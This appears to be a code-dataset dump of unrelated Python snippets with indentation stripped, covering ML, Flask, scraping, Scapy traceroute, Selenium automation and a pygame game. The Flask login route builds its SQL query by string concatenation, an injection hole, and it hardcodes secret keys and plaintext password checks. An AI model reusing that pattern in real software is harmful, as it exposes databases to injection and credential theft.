category_rules,
severity_rules,
_schema,
neg_filters=["definite_negated_existence",
"probable_negated_existence"],
exclusion_categories=["QUALITY_FEATURE",
"ARTIFACT"]):
"""
Look at the targets and their modifiers to get an overall
classification for the document_markup
"""
rslts = {}
qualityInducedUncertainty = False
try:
g = doc.getDocumentGraph()
except:
g = doc
targets = [n[0] for n in g.nodes(data=True)
if n[1].get("category", "") == 'target']
if targets:
for t in targets:
severity_values = []
current_rslts = {}
current_category = t.getCategory()
if not t.isA(exclusion_categories):
# iterate across all the classification_rules
current_rslts = \
{rk:utils.generic_classifier(g,
t,
classification_rules[rk])
for rk in classification_rules}
for cr in category_rules:
utils.anatomy_recategorize(g, t, cr)
for sv in severity_rules:
severity = utils.get_severity(g, t, sv)
severity_values.extend(severity)
current_category = t.categoryString()
# now need to compare current_rslts to rslts
# to select most Positive
docr = classify_result(current_rslts, _schema)
trslts = rslts.get(current_category, (-1, '', []]))
if trslts[0] < docr:
trslts = (docr, t.getXML(), severity_values)
rslts[current_category] = trslts
else:
if t.isA('QUALITY_FEATURE'):
qualityInducedUncertainty = True
else:
# if non-negated artifacts call uncertain
if not utils.modifies(g, t, neg_filters):
qualityInducedUncertainty = True
return rslts
|
18,319 | ce4411e56d41156773d666d31a1c1a0f175f0548 | a=[i for i in input().split()]
if a[0]==a[1]:
print("=")
elif a==sorted(a):
print("<")
else:
print(">") |
18,320 | 46d95c52ed50dabb77c98e824d7a6a6b0baca730 | from flask import render_template, url_for, request, redirect, session
from app import app
from app.authhelper import get_signin_url, get_token_from_code, access_token_is_valid
from app.graphapi import get_me
def get_redirect_uri():
'''
Return the location to pass to the MS OAuth2 framework
'''
return url_for('token', _external=True, _scheme='https')
@app.route('/')
def login():
redirect_uri = get_redirect_uri()
sign_in_url = get_signin_url(redirect_uri)
context = {'sign_in_url': sign_in_url}
return render_template('login.html', **context)
@app.route('/get_token')
def token():
# receive the authorization code
auth_code = request.args.get('code')
if get_token_from_code(auth_code, get_redirect_uri()):
return redirect(url_for('profile'))
else:
return redirect(url_for('login'))
@app.route('/me')
def profile():
if not access_token_is_valid(get_redirect_uri()):
return redirect(url_for('login'))
user = get_me()
context = {'user': user}
return render_template('home.html', **context)
|
18,321 | 03b778ac6fe6c81a6aa965fd802e128ed495b6c2 | string = "hello"
string = iter(string)
print(next(string))
|
18,322 | 34f7bca37784bb13b472b3cf87aa796f64b8696b | # -*- coding: utf-8 -*-
"""
执行脚本main.py
描述:
该demo是展示如何计算带约束的两个最大化目标的帕累托前沿
本案例调用q_sorted_new_templet算法模板解决该问题
其中为了方便展示,把目标函数和罚函数均和执行脚本写在同一个文件里,建议分开写在不同的文件中。
"""
import numpy as np
import geatpy as ga
# 注意:不建议把目标函数放在执行脚本内,建议放在另一个文件中
def aimfuc(x): # 定义目标函数
x1 = x[:, [0]]
fun1 = -x1**2
fun2 = -(x1 - 2)**2
return np.hstack([fun1, fun2]) # 对矩阵进行转置使得目标函数矩阵符合Geatpy数据结构
def punishing(x, FitnV): # 定义罚函数
x1 = x[:, [0]]
idx1 = np.where(x1**2 - 2.5 * x1 + 1.5 < 0)[0]
FitnV[idx1] = 0
return [FitnV, idx1] # 返回新的适应度以及非可行解的下标矩阵
if __name__ == "__main__":
AIM_M = __import__('main') # 获取函数所在文件的地址
PUN_M = __import__('main') # 获取罚函数所在文件的地址
# 变量设置
ranges = np.array([[-10], [10]]) # 生成自变量的范围矩阵
borders = np.array([[1], [1]]) # 生成自变量的边界矩阵(1表示变量的区间是闭区间)
precisions = [1] # 因为变量范围都是闭区间,而且nsga2_templet编程模板采用的是实数编码,因此precisions不起作用,但要设置成大于0的任意值
FieldDR = ga.crtfld(ranges, borders, precisions) # 生成区域描述器
# 调用编程模板
[ObjV, NDSet, NDSetObjV, times] = ga.q_sorted_new_templet(AIM_M, 'aimfuc', PUN_M, 'punishing', FieldDR, 'R', maxormin = -1, MAXGEN = 1000, MAXSIZE = 500, NIND = 50, SUBPOP = 1, GGAP = 1, selectStyle = 'tour', recombinStyle = 'xovdp', recopt = 0.9, pm = 0.6, distribute = True, drawing = 1)
|
18,323 | 7c42e4483702cdd5c5e3d488adacf0408d28d20c | # coding:utf-8
__author__ = 'lyb'
# Date:2018/8/6 11:50
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " \
"Chrome/68.0.3423.2 Safari/537.36"
MONGO_URI = 'ip'
MONGO_DB = 'movie'
MONGO_TABLE = 'maoyanmovie_top100'
PROXY_POOL_URL = 'http://localhost:5555/random'
PROXY = None
|
18,324 | 66846d371c8e56dd7715d5a7413a468f176a5e69 | from flask import Flask, request, jsonify
from flask_restx import Api, Resource, fields
from flask_mysqldb import MySQL
from flask_jwt_extended import (
JWTManager,
create_access_token,
create_refresh_token,
)
import datetime
app = Flask(__name__)
mysql = MySQL()
jwt = JWTManager()
# ganti sesuai data yang cocok
app.config["MYSQL_USER"] = "root"
app.config["MYSQL_PASSWORD"] = ""
app.config["MYSQL_DB"] = "proyek_spk"
app.config["MYSQL_HOST"] = "localhost"
app.config["SECRET_KEY"] = "ldkfjosier36+41+6e4r343544664"
app.config["JWT_SECRET_KEY"] = "364746^^&@%$&@)!+525"
app.config.setdefault("JWT_TOKEN_LOCATION", ("headers",))
# Options for JWTs when the TOKEN_LOCATION is headers
app.config.setdefault("JWT_HEADER_NAME", "Authorization")
app.config.setdefault("JWT_HEADER_TYPE", "Bearer")
mysql.init_app(app)
jwt.init_app(app)
# conn = mysql.connect()
# cursor = conn.cursor()
api = Api(app, version="1.0", description="Api untuk auth")
ns = api.namespace("auth", description="AUTH operation")
login_data = api.model(
"Login",
{
"username": fields.String(required=True),
"password": fields.String(required=True),
},
)
@ns.route("/login")
class LoginRoute(Resource):
@ns.expect(login_data)
def post(self):
cur = mysql.connect.cursor()
data_login = request.json
cur.execute(
"SELECT * FROM login WHERE username = '"
+ str(data_login["username"])
+ "'"
)
data = cur.fetchone()
# print(data['username'])
if data is not None and data[2] == data_login["password"]:
jwt_token_access = create_refresh_token(
identity=data_login["username"]
)
jwt_token_refresh = create_access_token(
identity=data_login["username"]
)
message_object = {
"status": "berhasil",
"access_token": jwt_token_access,
"refresh_token": jwt_token_refresh,
}
return jsonify(message_object)
else:
return {"status": "gagal"}
# @ns.marshal_with(login_data)
# def get(self):
# #ganti sesuai nama table user
# cur = mysql.connection.cursor()
# cur.execute("SELECT * FROM login")
# data = cur.fetchone()
# print(data)
@ns.route("/logout")
class LogoutRoute(Resource):
def post(self):
return {"status": "Berhasil Logout"}
if __name__ == "__main__":
app.run(debug=True)
|
18,325 | 29b20fc9b55e71a8452a3dce524edea78b7a26c4 | from sqlalchemy import Column, Integer, String, DateTime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Category(Base):
__tablename__ = 'categories'
id = Column(Integer, primary_key=True)
name = Column(String(30), nullable=False)
def __repr__(self):
pass
def __init__(self, name):
self.title = title
self.name = name
|
18,326 | 67fd5113557966b6a85c8d07923a6f7f74acf6e1 | #! /usr/bin/env python
# Set log level to benefit from Scapy warnings
import logging
logging.getLogger("scapy").setLevel(1)
from scapy.all import *
if __name__ == "__main__":
hosts = raw_input('Hostnames you would like to traceroute sepearated by a comma: ')
ttl = raw_input("Time To Live: ")
if not ttl: ttl = 20
traceroute([x.strip() for x in hosts.split(',')],maxttl=ttl) |
18,327 | 4f07f07191bc05beb891291c6f7ad70317da1137 | __all__ = ["block_string_value"]
def block_string_value(raw_string: str) -> str:
"""Produce the value of a block string from its parsed raw value.
Similar to CoffeeScript's block string, Python's docstring trim or Ruby's
strip_heredoc.
This implements the GraphQL spec's BlockStringValue() static algorithm.
"""
lines = raw_string.splitlines()
common_indent = None
for line in lines[1:]:
indent = leading_whitespace(line)
if indent < len(line) and (common_indent is None or indent < common_indent):
common_indent = indent
if common_indent == 0:
break
if common_indent:
lines[1:] = [line[common_indent:] for line in lines[1:]]
while lines and not lines[0].strip():
lines = lines[1:]
while lines and not lines[-1].strip():
lines = lines[:-1]
return "\n".join(lines)
def leading_whitespace(s):
i = 0
n = len(s)
while i < n and s[i] in " \t":
i += 1
return i
|
18,328 | f467cf0c505ee8ce549e037038556f9c4c6dc3c1 | # coding:utf-8
import tensorflow as tf
from keras import backend as K
import numpy as np
from config import GAMMA_N, MIN_BATCH, LOSS_V, LOSS_ENTROPY, NUM_STATES, NUM_ACTIONS, NONE_STATE, MODEL_DIR, NUM_WIDTH, NUM_SERIES
from pole_model import create_model
import os
# --各スレッドで走るTensorFlowのDeep Neural Networkのクラスです -------
class LocalBrain:
def __init__(self, name, parameter_server, config, thread_type): # globalなparameter_serverをメンバ変数として持つ
with tf.name_scope(name):
self.train_queue = [[], [], [], [], []] # s, a, r, s', s' terminal mask
K.set_session(config.sess)
self.config = config
self.model = self._build_model() # ニューラルネットワークの形を決定
self._build_graph(name, parameter_server) # ネットワークの学習やメソッドを定義
def _build_model(self): # Kerasでネットワークの形を定義します
model = create_model(self.config.simple)
model._make_predict_function() # have to initialize before threading
return model
def _build_graph(self, name, parameter_server): # TensorFlowでネットワークの重みをどう学習させるのかを定義します
ns = NUM_WIDTH[int(self.config.simple)]
if self.config.simple:
self.s_t = tf.placeholder(tf.float32, shape=(None, ns, ns))
else:
self.s_t = tf.placeholder(tf.float32, shape=(None, ns, ns, NUM_SERIES))
self.a_t = tf.placeholder(tf.float32, shape=(None, NUM_ACTIONS))
self.r_t = tf.placeholder(tf.float32, shape=(None, 1)) # not immediate, but discounted n step reward
p, v = self.model(self.s_t)
# loss関数を定義します
log_prob = tf.log(tf.reduce_sum(p * self.a_t, axis=1, keep_dims=True) + 1e-10)
advantage = self.r_t - v
loss_policy = - log_prob * tf.stop_gradient(advantage) # stop_gradientでadvantageは定数として扱います
loss_value = LOSS_V * tf.square(advantage) # minimize value error
entropy = LOSS_ENTROPY * tf.reduce_sum(p * tf.log(p + 1e-10), axis=1, keep_dims=True) # maximize entropy (regularization)
self.loss_total = tf.reduce_mean(loss_policy + loss_value + entropy)
# 重みの変数を定義
self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name) # パラメータを宣言
# 勾配を取得する定義
self.grads = tf.gradients(self.loss_total, self.weights_params)
# ParameterServerの重み変数を更新する定義(zipで各変数ごとに計算)
self.update_global_weight_params = \
parameter_server.optimizer.apply_gradients(zip(self.grads, parameter_server.weights_params))
# PrameterServerの重み変数の値を、localBrainにコピーする定義
self.pull_global_weight_params = [l_p.assign(g_p)
for l_p, g_p in zip(self.weights_params, parameter_server.weights_params)]
# localBrainの重み変数の値を、PrameterServerにコピーする定義
self.push_local_weight_params = [g_p.assign(l_p)
for g_p, l_p in zip(parameter_server.weights_params, self.weights_params)]
def pull_parameter_server(self): # localスレッドがglobalの重みを取得する
self.config.sess.run(self.pull_global_weight_params)
def push_parameter_server(self): # localスレッドの重みをglobalにコピーする
self.config.sess.run(self.push_local_weight_params)
def update_parameter_server(self): # localbrainの勾配でParameterServerの重みを学習・更新します
if len(self.train_queue[0]) < MIN_BATCH: # データがたまっていない場合は更新しない
return
s, a, r, s_, s_mask = self.train_queue
self.train_queue = [[], [], [], [], []]
s = np.array(s)
a = np.vstack(a)
r = np.vstack(r)
s_ = np.array(s_)
s_mask = np.vstack(s_mask)
_, v = self.model.predict(s_)
# N-1ステップあとまでの時間割引総報酬rに、Nから先に得られるであろう総報酬vに割引N乗したものを足します
r = r + GAMMA_N * v * s_mask # set v to 0 where s_ is terminal state
feed_dict = {self.s_t: s, self.a_t: a, self.r_t: r} # 重みの更新に使用するデータ
self.config.sess.run(self.update_global_weight_params, feed_dict) # ParameterServerの重みを更新
def predict_p(self, s): # 状態sから各actionの確率pベクトルを返します
p, v = self.model.predict(s)
return p
def train_push(self, s, a, r, s_):
self.train_queue[0].append(s)
self.train_queue[1].append(a)
self.train_queue[2].append(r)
if s_ is None:
self.train_queue[3].append(NONE_STATE[int(self.config.simple)])
self.train_queue[4].append(0.)
else:
self.train_queue[3].append(s_)
self.train_queue[4].append(1.)
def load_weight(self):
self.model.load_weights(os.path.join(MODEL_DIR, 'model_weights.hdf5'))
def save(self):
if not os.path.isdir(MODEL_DIR):
os.makedirs(MODEL_DIR)
with tf.variable_scope("parameter_server"):
try:
json_string = self.model.to_json()
open(os.path.join(MODEL_DIR, 'model.json'), 'w').write(json_string)
self.model.save_weights(os.path.join(MODEL_DIR, 'model_weights.hdf5'))
except:
pass
|
18,329 | be7c868323c0f2e3d2c4213fdfd4fffb517546ad | # 04_suche_nach_summenformel_auf_wikipedia.py
# Webscraper für Summenformeln aus Wikipedia
import requests, logging, re, os
os.chdir(os.path.dirname(__file__))
logging.basicConfig(level=logging.CRITICAL, format='%(asctime)s - %(levelname)s - %(message)s')
def search_in_string(content):
global attempt
logging.debug('Suche nach Summenformeln...')
search_pattern=re.compile(r'>Summenformel<(.*?)</tr>', re.DOTALL)
results=search_pattern.findall(content)
logging.debug('results: '+str(results))
search_pattern=re.compile(r'>([[A-Za-z]{1,}).*?>(\d*)')
result=search_pattern.findall(str(results))
logging.debug('result: '+str(result))
if len(result) != 0:
summenformel=''
for i in range(len(result)):
logging.debug('Loop vergleich:'+''.join(result[i])+'--->'+''.join(result[i-1]))
if result[i] == result[i-1]:
break
summenformel+=''.join(result[i])
logging.info('Summenformel gefunden:'+summenformel)
else:
if attempt != 1:
url_name='https://de.wikipedia.org/wiki/'+s_name.title()+'eigenschaften'
attempt=1
content=get_content(url_name)
download_file(content)
else:
logging.info('Keine Summenformel gefunden.')
def download_file(content):
temp_file=open('.\\tempfile.tmp', 'wb')
logging.info('Download beginnt:')
for chunks in content.iter_content(10**6):
temp_file.write(chunks)
temp_file.close()
logging.info('Download abgeschlossen:')
read_content()
def read_content():
temp_file=open('.\\tempfile.tmp', encoding='UTF-8')
try:
content=(temp_file.read())
except Exception as error_message:
logging.error('Fehler beim verarbeiten des Dateiinhalts')
print('Fehler aufgetreten: %s' % [error_message])
return
temp_file.close()
os.remove('.\\tempfile.tmp')
search_in_string(str(content))
def get_content(url_name):
logging.debug('Prüfe URL')
content=requests.get(url_name)
content.raise_for_status()
return content
while True:
try:
attempt=''
print('Stoffname eingeben:')
s_name=input()
url_name='https://de.wikipedia.org/wiki/'+s_name.title()
content=get_content(url_name)
logging.debug('URL gefunden:'+url_name)
download_file(content)
except Exception as error_message:
logging.error('URL nicht gefunden.')
print('Fehler aufgetreten: %s' % [error_message])
continue
|
18,330 | 82e16d83cfa2098f4e7f18eaad7cff16544d7c2d | import time
import login
import setup
import prenotazione
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
import os
# inserire matricola e password
os.system('cls')
setup.matricola = input("Matricola: ")
setup.password = input("Password: ")
# apre il sito
setup.driver.get("https://kairos.unifi.it/portalePlanning/BIBL/login.php")
# fa il login con matricola e password
# TODO: controllo sulle credenziali, se errate serve errore
login.login()
os.system('cls')
print("Scegliere il servizio da eseguire: ")
mode = int(input("\nNuova prenotazione -> 1 \nVisualizza prenotazioni -> 2: "))
print("Caricamento...")
if mode == 1: # nuova prenotazione
# aspetta che la pagina principale venga caricata
try:
pagina_principale = WebDriverWait(setup.driver, 5).until(
EC.presence_of_element_located((By.ID, "titolo-pagina"))
)
# esegue prenotazione per la mattina
prenotazione.nuova_prenotazione("Mattina")
except NoSuchElementException:
print("Finito Mattina")
time.sleep(2)
try:
pagina_principale = WebDriverWait(setup.driver, 5).until(
EC.presence_of_element_located((By.ID, "titolo-pagina"))
)
# esegue prenotazione per il pomeriggio
prenotazione.nuova_prenotazione("Pomeriggio")
except NoSuchElementException:
print("Finito pomeriggio")
# finite le prenotazioni, chiude tutto
print("Tutte le prenotazioni sono state eseguite!")
elif mode == 2: # visualizza prenotazioni
try:
pagina_principale = WebDriverWait(setup.driver, 10).until(
EC.presence_of_element_located((By.ID, "titolo-pagina"))
)
prenotazione.gestione_prenotazioni()
except NoSuchElementException:
print("Impossibile aprire pagina prenotazioni!")
else:
print("Comando errato!")
setup.driver.quit()
|
18,331 | 41e99bf2e7ce231c981822933f1de10755f577e3 | class constants:
CATEGORIES = [
"artliterature",
"language",
"sciencenature",
"general",
"fooddrinkn",
"peopleplaces",
"geography",
"historyholidays",
"entertainment",
"toysgames",
"music mathematics",
"religionmythology",
"sportsleisure",
] |
18,332 | 65027b362b7e977b428cd62218fc050ff2e39877 | from django.db import models
# Create your models here.
class Producto(models.Model):
producto = models.CharField(max_length=25)
url_de_busqueda = models.URLField()
def __str__(self):
return self.producto
class Correo(models.Model):
email = models.EmailField()
class Existencias(models.Model):
pass |
18,333 | ae8261e515dde3cca13fde5e5102c55d71dc353b | #!/usr/local/bin/python3
from time import time
import pygame
#
SECONDS_TO_MICRO_SECONDS = 1000000
#
TUPLE_COLOR_BLACK = (0, 0, 0)
TUPLE_COLOR_GREEN = (0, 226, 143)
TUPLE_COLOR_RED = (226, 70, 70)
#
IMAGE_BIG_MAC = "big_mac_small.png"
IMAGE_RICHARD_SIMMONS = "richard_simmons_small_2.png"
# Frames per second
TIME_TICK_LOOP = 120
#
MARGIN_SCREEN = 20
MARGIN_OPPONENTS = MARGIN_SCREEN + 105
HEIGHT_SCREEN = 720
WIDTH_SCREEN = 1080
LENGTH_BOX_SHIP = 50
# Player frame
HEIGHT_FRAME_PLAYER = max(
HEIGHT_SCREEN // 10, LENGTH_BOX_SHIP)
WIDTH_FRAME_PLAYER = WIDTH_SCREEN
WIDTH_FRAME_PLAYER_HALF = WIDTH_FRAME_PLAYER // 2
# Opponent frame
FACTOR_HEIGHT_FRAME_OPPONENTS = 1.0 / 2.0
HEIGHT_FRAME_OPPONENTS = (
HEIGHT_SCREEN - HEIGHT_FRAME_PLAYER)
WIDTH_FRAME_OPPONENTS = WIDTH_SCREEN
#
ACCELERATION_VALUE_MAX = 50
ACCELERATION_INCREMENT_HUMAN = 10
ACCELERATION_MULTIPLIER = 2.5
DECCELERATION_FACTOR = 0.85
INCREMENT_MOVE_X_OPPONENT = 10
INCREMENT_MOVE_Y_OPPONENT = 30
#
COUNT_COLUMN_AND_ROW_OPPONENT = 7
#
DIRECTION_NONE = -1
DIRECTION_LEFT = 0
DIRECTION_RIGHT = 1
DIRECTION_UP = 2
DIRECTION_DOWN = 3
#
WINNER_NONE = -1
WINNER_HUMAN = 0
WINNER_OPPONENT = 1
def sign(value):
if value == 0:
return 0
return int(abs(value) / value)
class BasicSprite:
def __init__(self, screen, sprite, rect):
self.create_random_id()
self.screen = screen
self.sprite = sprite
self.rect = rect
self.update_dimensions()
self.update_mask()
self.set_exists(True)
# Assigns an id using current time in microseconds
def create_random_id(self):
self.id = int(time() * SECONDS_TO_MICRO_SECONDS)
# Ensures destroyed object won't be redrawn; however, object needs to be
# removed externally (i.e. where it is stored)
def destroy(self):
self.set_exists(False)
def update_rect(self):
self.rect = self.sprite.get_rect()
def update_dimensions(self):
self.dimensions = self.sprite.get_size()
def update_mask(self):
self.mask = pygame.mask.from_surface(self.sprite)
#print("\nmask {}\n".format(self.mask.__dir__()))
def get_mask(self):
return self.mask
def get_coordinates(self):
return (
self.rect.left,
self.rect.right,
self.rect.top,
self.rect.bottom)
# Distance between left side and left side of screen
def get_left_gap(self):
return self.rect.left
# Distance between right side and right side of screen
def get_right_gap(self):
return (WIDTH_SCREEN - self.rect.right)
def exists(self):
return self._exists
# Determine if two sprites overlap/collide
def check_overlaps(self, basic_sprite):
value = self.mask.overlap(
basic_sprite.get_mask(),
(basic_sprite.rect.left - self.rect.left,
basic_sprite.rect.top - self.rect.top))
return value
def set_exists(self, exists):
self._exists = exists
# Move to position unless outside of allowed coordinates; returns actual
# position delta in contrast with asked
def set_location(self, x, y):
center_change = [
self.rect.centerx,
self.rect.centery]
self.rect.centerx = x
self.rect.centery = y
# Ensure within allowed coordinates
if self.rect.left < MARGIN_SCREEN:
self.rect.centerx = MARGIN_SCREEN + self.dimensions[0] // 2
elif self.rect.right > (WIDTH_SCREEN - MARGIN_SCREEN):
self.rect.centerx = (
(WIDTH_SCREEN - MARGIN_SCREEN) - self.dimensions[0] // 2)
# Return true position delta
center_change[0] = self.rect.centerx - center_change[0]
center_change[1] = self.rect.centery - center_change[1]
return center_change
# Scale sprite to box container (max_dimension X max_dimension)
def scale_to_fit(self, max_dimension):
scale_factor = (
float(max_dimension) / float(max(*self.dimensions)))
width = int(float(self.dimensions[0]) * scale_factor)
height = int(float(self.dimensions[1]) * scale_factor)
self.sprite = pygame.transform.scale(self.sprite, (width, height))
self.update_rect()
self.update_dimensions()
self.update_mask()
# Translate by some delta ensuring to stay within allowed range
def translate(self, x, y):
return self.set_location(self.rect.centerx + x, self.rect.centery + y)
# Only redraw if 'exists'
def redraw(self):
if self.exists():
self.screen.blit(self.sprite, self.rect)
return self.exists()
class Background(BasicSprite):
def __init__(self, screen):
super().__init__(
screen,
pygame.Surface(screen.get_size()),
(0, 0))
self.sprite.fill(TUPLE_COLOR_BLACK)
# Simple Text Label
class Text(BasicSprite):
def __init__(self, screen, text, color, font, size):
self.text = text
self.color = color
self.font = font
self.size = size
self.my_font = pygame.font.SysFont(font, size)
self.label = self.my_font.render(text, 1, color)
super().__init__(
screen,
self.label,
self.label.get_rect())
# Base spaceship
class SpaceShip(BasicSprite):
def __init__(self, screen, ship_image, default_square_color):
# Attempt to load image
try:
sprite = pygame.image.load(ship_image)
# Create rect instead
except Exception as e:
print("{}\nLoading default square".format(e))
sprite = pygame.Surface((LENGTH_BOX_SHIP, LENGTH_BOX_SHIP))
# Set color
sprite.fill(default_square_color)
super().__init__(screen, sprite, sprite.get_rect())
self.scale_to_fit(LENGTH_BOX_SHIP)
# default location
self.set_location(0, 0)
class HumanSpaceShip(SpaceShip):
def __init__(self, screen):
super().__init__(screen, IMAGE_RICHARD_SIMMONS, TUPLE_COLOR_GREEN)
# Floor division set to middle
self.set_location(WIDTH_SCREEN / 2, HEIGHT_SCREEN / 2)
# Set 0 acceleration
self.acceleration = [0, 0]
# Center within allowed human coordinates
def center(self):
x = WIDTH_FRAME_PLAYER / 2
y = (
HEIGHT_SCREEN -
(HEIGHT_FRAME_PLAYER / 2))
self.set_location(x, y)
# Accelerate in only -/+ x direction; inhibit acceleration while
# approaching sides
def accelerate(self, x, y):
# X
self.acceleration[0] += x
gap = WIDTH_FRAME_PLAYER_HALF
if sign(self.acceleration[0]) > 0:
gap = (
WIDTH_FRAME_PLAYER -
self.rect.centerx -
self.dimensions[0] // 2)
elif sign(self.acceleration[0]) < 0:
gap = (
self.rect.centerx -
self.dimensions[0] +
self.dimensions[0] // 2)
gap = int(float(gap) * 0.75)
limit_x = min(
int(ACCELERATION_VALUE_MAX *
gap * ACCELERATION_MULTIPLIER / WIDTH_FRAME_PLAYER),
ACCELERATION_VALUE_MAX)
self.acceleration[0] = (
sign(self.acceleration[0]) *
min(abs(self.acceleration[0]), limit_x))
# Y - Unfinished since restricted y-movement
self.acceleration[1] += y
self.acceleration[1] = (
sign(self.acceleration[1]) *
min(self.acceleration[1], ACCELERATION_VALUE_MAX))
# Decrement acceleration to inhibit continuous movement
def deccelerate(self):
if abs(self.acceleration[0]) > 0:
self.acceleration[0] = int(
float(self.acceleration[0]) * DECCELERATION_FACTOR)
if abs(self.acceleration[1]) > 0:
self.acceleration[1] = int(
float(self.acceleration[1]) * DECCELERATION_FACTOR)
def redraw(self):
self.translate(self.acceleration[0], self.acceleration[1])
super(SpaceShip, self).redraw()
self.deccelerate()
class OpponentSpaceShip(SpaceShip):
def __init__(self, screen):
super().__init__(screen, IMAGE_BIG_MAC, TUPLE_COLOR_RED)
# Floor division set to middle
self.set_location(WIDTH_SCREEN / 2, HEIGHT_SCREEN / 2)
# Handles all opponent space ships
class OpponentSquadron:
def __init__(self, screen, row_and_column_size):
self.direction = DIRECTION_RIGHT
self.direction_previous = self.direction
self.screen = screen
self.row_and_column_size = row_and_column_size
self.ships = {}
self.left = {}
self.right = {}
self.front_line = {}
self.setup_ships()
# Return front ships
def get_front_line_ships(self):
return self.front_line
# Evenly space out ships within initial allowed range
def setup_ships(self):
start_bottom_edge = int(
float(HEIGHT_FRAME_OPPONENTS) * FACTOR_HEIGHT_FRAME_OPPONENTS)
horizontal_separation = (
(WIDTH_SCREEN - (2 * MARGIN_OPPONENTS)) / self.row_and_column_size)
vertical_separation = start_bottom_edge / self.row_and_column_size
for r in range(0, self.row_and_column_size):
for c in range(0, self.row_and_column_size):
ship = OpponentSpaceShip(self.screen)
id = ship.id
x = int(
(0.5 + float(r)) * horizontal_separation +
MARGIN_OPPONENTS)
y = int((0.5 + float(c)) * vertical_separation)
ship.set_location(x, y)
if r == 0:
self.left[id] = ship
if r == (self.row_and_column_size - 1):
self.right[id] = ship
if c == (self.row_and_column_size - 1):
self.front_line[id] = ship
self.ships[id] = ship
# Check whether left or right ships reached allowed edge/coordinates
def check_reached_boundary(self):
ships = self.left
if self.direction == DIRECTION_RIGHT:
ships = self.right
ship = list(ships.values())[0]
#
gap = MARGIN_SCREEN * 2
if self.direction == DIRECTION_RIGHT:
gap = ship.get_right_gap()
else:
gap = ship.get_left_gap()
#
return (gap <= MARGIN_SCREEN)
# Update which direction ships are flying in
def update_direction(self):
tmp_direction = self.direction
# Currently moving left
if ((self.direction == DIRECTION_LEFT) or
(self.direction == DIRECTION_RIGHT)):
if self.check_reached_boundary():
self.direction = DIRECTION_DOWN
self.direction_previous = tmp_direction
# Switch to left or right?
elif self.direction == DIRECTION_DOWN:
if self.direction_previous == DIRECTION_LEFT:
self.direction = DIRECTION_RIGHT
else:
self.direction = DIRECTION_LEFT
self.direction_previous = tmp_direction
# Calculate translation delta and move
def move_ships(self):
translation = [0, 0]
#
self.update_direction()
#
if self.direction == DIRECTION_LEFT:
translation = [-1 * INCREMENT_MOVE_X_OPPONENT, 0]
elif self.direction == DIRECTION_RIGHT:
translation = [INCREMENT_MOVE_X_OPPONENT, 0]
elif self.direction == DIRECTION_DOWN:
translation = [0, INCREMENT_MOVE_Y_OPPONENT]
#
'''
ships_to_move = {
id: ship
for id, ship in ships_to_move.items() if ship not in ships_moved}
'''
#for id, ship in ships_to_move.items():
for id, ship in self.ships.items():
ship.translate(translation[0], translation[1])
def update(self):
self.move_ships()
for id, ship in self.ships.items():
ship.redraw()
# print("{} coords: {}".format(ship.id, ship.get_coordinates()))
class Game:
def __init__(self):
pygame.init()
self.init_winner()
self.init_screen()
self.init_human_ship()
self.init_opponent_squadron()
def init_winner(self):
self.winner = WINNER_NONE
self.winner_text = None
def init_screen(self):
self.screen = pygame.display.set_mode(
(WIDTH_SCREEN, HEIGHT_SCREEN))
self.background = Background(self.screen)
def init_human_ship(self):
self.human_ship = HumanSpaceShip(self.screen)
self.human_ship.center()
def init_opponent_squadron(self):
self.opponent_squadron = OpponentSquadron(
self.screen, COUNT_COLUMN_AND_ROW_OPPONENT)
def check_collisions(self):
if self.human_ship is not None:
collided = False
ships = self.opponent_squadron.get_front_line_ships().items()
for id, ship in ships:
if self.human_ship.check_overlaps(ship):
ship.destroy()
collided = True
#
if collided:
self.human_ship.destroy()
def clean_up(self):
if self.human_ship is not None:
if not self.human_ship.exists():
self.human_ship = None
def update_winner(self):
if self.winner == WINNER_NONE:
text = None
color = None
if self.human_ship is None:
self.winner = WINNER_OPPONENT
text = "Opponent"
color = TUPLE_COLOR_RED
elif self.opponent_squadron is None:
self.winner = WINNER_HUMAN
text = "Human"
color = TUPLE_COLOR_GREEN
else:
self.winner = WINNER_NONE
#
if self.winner != WINNER_NONE:
text = "{} Wins!".format(text)
self.winner_text = Text(
self.screen, text, color, "arial", 60)
self.winner_text.set_location(
WIDTH_SCREEN // 2, HEIGHT_SCREEN // 2)
def update(self):
self.background.redraw()
#
self.update_winner()
if self.winner == WINNER_NONE:
#
self.check_collisions()
self.clean_up()
if self.human_ship is not None:
self.human_ship.redraw()
self.opponent_squadron.update()
else:
self.winner_text.redraw()
# Update display
pygame.display.flip()
def handle_key_pressed(self):
if self.human_ship is not None:
# Get key input
key_input = pygame.key.get_pressed()
#
if key_input[pygame.K_LEFT]:
self.human_ship.accelerate(-1 * ACCELERATION_INCREMENT_HUMAN, 0)
elif key_input[pygame.K_RIGHT]:
self.human_ship.accelerate(ACCELERATION_INCREMENT_HUMAN, 0)
def handle_events(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit(0)
def loop(self):
self.update()
self.clock = pygame.time.Clock()
while True:
# Frames per second
self.clock.tick(TIME_TICK_LOOP)
pygame.event.pump()
self.handle_key_pressed()
self.handle_events()
self.update()
def main():
game = Game()
game.loop()
if __name__ == '__main__':
main()
|
18,334 | a57c4c44f5ba576d1180bf7d117a49bda20b4789 | from math import pi
a=eval(input('enter the value of the angle:'))
b=eval(input('enter the length of the radius:'))
c=a/360
d=c*2*pi*b*b
print('the area of your input sector is',d)
|
18,335 | be9f7bc00e3ff9243614d688ca85667e3c471024 | import os
import time
import math
from PIL import Image, ImageDraw
import utilities
## Config
CONFIG_OPTIONS = utilities.load_config()
## Todo: genericize and move into bot_io.py?
class PlotterFileController:
## Keys
RESOURCES_FOLDER_KEY = "resources_folder"
RESOURCES_FOLDER_PATH_KEY = "resources_folder_path"
MAP_FILES_KEY = "map_files"
MAP_FILE_PATHS_KEY = "map_file_paths"
MAP_FILE_EXTENSION_KEY = "map_file_extension"
OUTPUT_FOLDER_KEY = "output_folder"
OUTPUT_FOLDER_PATH_KEY = "output_folder_path"
## Defaults
RESOURCES_FOLDER = CONFIG_OPTIONS.get(RESOURCES_FOLDER_KEY, "resources")
